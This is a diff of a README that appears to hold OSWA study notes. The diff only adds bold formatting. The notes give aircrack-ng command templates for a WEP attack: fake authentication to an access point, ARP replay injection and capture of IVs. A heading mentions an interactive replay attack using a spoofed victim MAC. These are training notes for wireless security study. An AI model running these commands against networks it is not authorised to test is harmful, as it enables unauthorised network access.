Optixal/OSWA-Notes/README.md

 * Get ESSID, BSSID, Client's MAC, Channel.
 `airodump-ng [interface]`

 * Attempt to associate with AP.
-Successful when "Association successful :)" appears and stays, with no deauthentication messages.
+Successful when "Association successful :)" **appears** and **stays**, with no deauthentication messages.
 `aireplay-ng --fakeauth 0 -a [MAC of AP] -h [Our/Client's MAC] -e [Name of AP] [interface]` `aireplay-ng --fakeauth 15 -a [MAC of AP] -h [Our/Client's MAC] -e [Name of AP] [interface]`
 `aireplay-ng --fakeauth 5000 -o 1 -q 15 -a [MAC of AP] -h [Our/Client's MAC] -e [Name of AP] [interface]`
 `aireplay-ng --fakeauth 20 -o 1 -q 15 -a [MAC of AP] -h [Our/Client's MAC] -e [Name of AP] [interface]`

 * Captures ARP requests and replays them to generate more ARP traffic.
-Do with fakeauth.
+Do with **fakeauth**.
 `aireplay-ng --arpreplay -b [MAC of AP] -h [Our/Client's MAC] [interface]`

 * Write out pcap file with captured ARP data packets and IVs.
-Do with fakeauth and inject.
+Do with **fakeauth** and inject.
 Successful when "Data" column in airodump rapidly goes up.
 `airodump-ng --bssid=[MAC of AP] -c [channel] -w [filename] [interface]`

 ###### No Client Associated Method 2 - Interactive Replay Attack (May require MAC of previously-seen-associated victim) (May require changing own MAC to victim's, refer below*)